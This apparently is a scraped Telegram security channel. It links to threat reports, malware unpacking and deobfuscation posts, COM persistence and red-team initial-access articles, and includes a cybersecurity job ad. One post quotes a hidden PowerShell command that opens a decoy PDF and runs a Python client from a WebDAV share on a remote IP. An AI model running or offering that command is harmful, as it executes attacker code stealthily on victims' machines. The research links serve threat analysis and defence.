Source Byte

Analysis of Cyber Anarchy Squad attacks targeting Russian and Belarusian organizations https://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/

Dark web threats and dark market predictions for 2025

https://securelist.com/ksb-dark-web-predictions-2025/114966/

Agent Tesla Analysis [Part 1: Unpacking]

https://ryan-weil.github.io/posts/AGENT-TESLA-1/

Deobfuscation of Lumma Stealer

https://ryan-weil.github.io/posts/LUMMA-STEALER/

Hijack the TypeLib. New COM persistence technique https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661

Hijack the TypeLib. New COM persistence technique https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661

Hi one-thing i forgot to mention :/ these opportunity jobs are CTI & TR at the time and it only available in Tehran have a nice day 😬

There is a job opportunity in the field of cybersecurity. If you are interested in working in this field, please send your resume via linkedin [ HERE ] or via telegram [ @AleeAmini ] . [ + ] Familiarity with reverse engineering and malware analysis. [ + ] Familiarity with one of the programming languages ​​Python, C/Cpp. [ + ] Familiarity with Linux operating system [ + ] Familiarity with security concepts. [ + ] Familiarity with Python, PowerShell and Bash scripting. [ + ] Familiarity with cyber attacks Skills that are considered as advantages: [ + ] Familiarity with Threat Intelligence [ + ] Familiarity with CTI concepts [ + ] Mastery of reverse engineering and binary analysis [ + ] Familiarity with Windows/Linux internals

or even run python remotely

-w hid -nop  -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/wody.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py"

https://cyble.com/blog/ursnif-trojan-hides-with-stealthy-tactics/ lnk are so strange you can literally do anything with them and yet no security log to detect them :(

SSHishing – Abusing Shortcut Files and the Windows SSH Client for Initial Access 🔗 Link #redteam #initial_access ——— 🆔 @Infosec_Fortress

.

Snowy Days & The Malware Packing Ways https://deluks2006.github.io/posts/snowy-days-and-the-malware-packing-ways/ #packers

Snowy Days & The Malware Packing Ways https://deluks2006.github.io/posts/snowy-days-and-the-malware-packing-ways/

Local Admin In Less Than 60 Seconds (Part 1) https://medium.com/@nickvourd/local-admin-in-less-than-60-seconds-part-1-e2a0c0102b99

Just an attempt to group extracted data from Defender for research purposes. https://github.com/HackingLZ/ExtractedDefender credits : Justin Elze

Catalog of key Windows kernel data structures https://codemachine.com/articles/kernel_structures.html Understanding EProcess Structure https://info-savvy.com/understanding-eprocess-structure/ Thanks to https://x.com/5mukx